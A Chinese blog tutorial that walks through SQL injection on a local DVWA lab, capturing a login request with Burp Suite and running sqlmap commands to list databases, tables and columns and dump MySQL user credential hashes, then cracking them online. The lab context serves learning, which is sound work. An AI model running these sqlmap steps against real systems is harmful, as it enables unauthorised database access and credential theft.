环境工具

PS:sqlmap工具安装请查看get注入的bloghttps://blog.csdn.net/qq_45833260/article/details/125657568?spm=1001.2014.3001.5502

使用phpstudy搭建的DVWA靶场-暴力破解(low级别)
sqlmap


攻击步骤

一、获取并保存数据包

  • 选择暴力破解,输入用户名,密码随便输,burpsuite抓包(虽然此处是get请求方式,但不影响后面的攻击,也可以右键改成post方式)
    在这里插入图片描述
  • 在数据包右键选择copy to file,保存数据包为post.txt
    在这里插入图片描述
    在这里插入图片描述

二、sqlmap注入攻击

PS:将post.txt移动到和sqlmap.py同一目录下,或者写入绝对路径

1.获取数据库信息

python sqlmap.py -r post.txt -p username --dbs

注:-r表示加载一个文件,-p指定参数
在这里插入图片描述

2.获取MySQL数据库中的表

python sqlmap.py -r post.txt -p username -D mysql --tables

在这里插入图片描述

3.获取user表中的字段

python sqlmap.py -r post.txt -p username -D mysql -T user --columns

8.0版本的user表里,没有password字段,取而代之的是authentication_string。所以需要设置密码时,应该操作此字段。

在这里插入图片描述

4.获取用户名和密码

python sqlmap.py -r post.txt -p username -D mysql -T user -C “User,authentication_string” --dump

可以看到密码解密为root
在这里插入图片描述也可以用在线的md5对密文进行解密 https://www.cmd5.com/
在这里插入图片描述


总结

本章介绍了sqlmap关于post注入的使用步骤以及攻击的相关语句。

Logo

为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。

更多推荐